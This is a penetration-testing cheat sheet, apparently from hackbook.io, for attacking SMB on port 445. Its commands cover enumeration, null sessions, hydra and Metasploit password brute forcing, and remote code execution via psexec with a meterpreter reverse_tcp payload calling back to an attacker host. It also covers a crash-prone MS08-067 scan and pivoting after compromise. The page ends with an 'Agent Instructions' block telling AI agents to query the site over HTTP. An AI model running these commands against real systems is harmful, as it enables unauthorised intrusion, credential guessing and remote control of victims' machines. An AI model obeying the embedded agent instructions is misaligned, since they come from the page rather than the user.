# SMB **---Port 445---**\ Can also be used with: 139 //this was pre 2000 windows as SMB was originally done via netbios and required a netbios connection. Now it is its own TCP protocol. Can be several other UDP ports when SMB is set up via Windows NetBios API\ ls -1 /usr/share/nmap/scripts/smb\* /remember that all of these have arg uments that you can pass to with --script-args=\ we coul also just run all of them with:\ nmap -p 445 --script smb\* \\ \ **SMB discover:**(connect and return os/smb info)\ nmap 10.10.10.111 --script=smb-os-discovery\ \ **SMB Vulnerability Scan**:\ nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.10.10.10\ \ **SMB Users & Shares Scan:**\ nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.10\ \ **Connect to SMB share**:\ (Linux)\ smbclient //MOUNT/share\ smbclient -L 10.10.10.3\ smbclient -L lame\ smbclient -U "" \\\\\\\10.10.10.3\\\tmp //also try to do a -N with this to say no password\ smbclient -N \\\\\\\172.16.80.22\\\tmp -U ""\ or\ smbclient -L 10.130.40.70 -U administrator\ \ (Windows)\ C:>net use \\\10.130.40.70\IPC$ password /u:administrator\ C:>net view \\\10.130.40.70\ \ \ **Nmap for SMB open:**\ \#nmap -p139,445 \ --open //only shows IPs with smb open\ or\ \#nmap -v -p 139,445 10.11.1.1-254\ \ **Search for smb scripts in nmap NSE:**\ \#ls -l /usr/share/nmap/scripts/ |grep smb\ //use a script\ \#nmap -p 139,445 --script smb-enum-users \\ //check for vulns with check-vulns script\ \#nmap -p 139,445 --script=smb-check-vulns --script-args=unsafe=1 \\ \ //Searching for IPs vuln to ms08-067\ //script-arg is used to pass the script arguments. in this case we pass it unsafe 1 which will exploit and crash the system if vulnerable.\ \#nmap -v -p 139,445 --script=smb-vuln-ms08-067 --script-args=unsafe=1 10.1\ 1.1.5\ \ \ **SMB NULL session:**\ Is an un authenticated netbios session. This is allowed to set up communications with new computers but can be abused up to windows xp svp1 as svp2 is patched. You can still look for incorrect configurations. A null session also allows unauthenticated hackers to obtain largeamounts of information about the machine, such as password policies, usernames,group names, machine names, user and host SIDs. This Microsoft feature existed inSMB1 by default\ SMB1 – Windows 2000, XP and Windows 2003.\ SMB2 – Windows Vista SP1 and Windows 2008\ SMB2.1 – Windows 7 and Windows 2008 R2\ SMB3 – Windows 8 and Windows 2012.\ \ \--\ **Null:**\ \#nmblookup -A 10.10.10.175\ \#smbmap -H 10.10.10.175\ List share contents:\ \#smbmap -R Replication -H 10.10.10.10\ Download a file:(will be placed in /usr/share)\ \#smbmap -R Replication -H 10.10.10.10 -A file.txt -q\ \ \ **Authed:**\ \#smbmap -d active.htb -u svc\_tgs -p somepasswrd -H 10.10.10.10\ List share contents:\ \#smbmap -d active.htb -u svc\_tgs -p somepasswrd -R Replication -H 10.10.10.10\ Download a file:(will be placed in /usr/share)\ \#smbmap -d active.htb -u svc\_tgs -p somepasswrd -R Replication -H 10.10.10.10 -A file.txt -q\ \--\ \ **Password Brute Forcing:**\ (RDP and SMB), increasing the number of threads may not be possibledue to protocol restrictions, making the password guessing process relatively slow. Ontop of this, protocol authentication negotiations of a protocol such as RDP are more timeconsuming than, say, HTTP, which slows down the attacks on these protocols evenmore. However, while brute-forcing the RDP protocol may be a slower process thanHTTP, a successful attack on RDP would often provide a bigger reward.\ \ //With MSF\ \#systemctl enable postgresql\ \#msfdb init\ \#msf\ msf > use auxiliary/scanner/smb/smb\_login\ msf auxiliary(smb\_login) > set PASS\_FILE /usr/share/seclists/Passwords/best15.txt\ msf auxiliary(smb\_login) > set USER\_FILE /usr/share/seclists/Usernames/top\_shortlist.txt\ msf auxiliary(smb\_login) > set RHOSTS 10.130.40.70\ msf auxiliary(smb\_login) > run\ \ //hydra\ hydra -L usernames.txt -P /usr/share/john/password.lst 192.168.2.66 smb -V -f\ \ \ -look into *dumpsec* for automated dumping of smb\ \ \ **Enumerate shares (Authenticated):**\ \#nmap --script=smb-enum-users -p 445 10.130.40.70 --script-args smbuser=administrator,smbpass=password\ //we can also use rpcclient and enumdomusers for this\ \ \ **RCE (Authenticated):**\ \ //Manual\ If we have writeable shares we can psexec\ \#psexec.py active.htb/svc\_tgs\@10.10.10.10\ \ //MSF\ msf > use exploit/windows/smb/psexec\ msf exploit(psexec) > set RHOST 10.130.40.70\ msf exploit(psexec) > set SMBPass password\ msf exploit(psexec) > set SMBUser administrator\ msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse\_tcp\ msf exploit(psexec) > set LHOST 172.16.10.5\ msf exploit(psexec) > exploit\ meterpreter > sysinfo\ \ \ \--------------------- Post Exploitation -------------------\ \ **Host discovery:**\ //This is to attempt pivoting from the compromised box that we are on. So first we will set up our routing then we will scan.\ meterpreter > run autoroute -s 172.30.111.0/24\ meterpreter > background\ msf exploit(psexec) > use auxiliary/scanner/portscan/tcp\ msf auxiliary(tcp) > set RHOSTS 172.30.111.0/24\ msf auxiliary(tcp) > set THREADS 10\ msf auxiliary(tcp) > set PORTS 139,445\ msf auxiliary(tcp) > run\ \ \ **Null session pivot to another box:**
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.hackbook.io/initial-access/services/smb.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.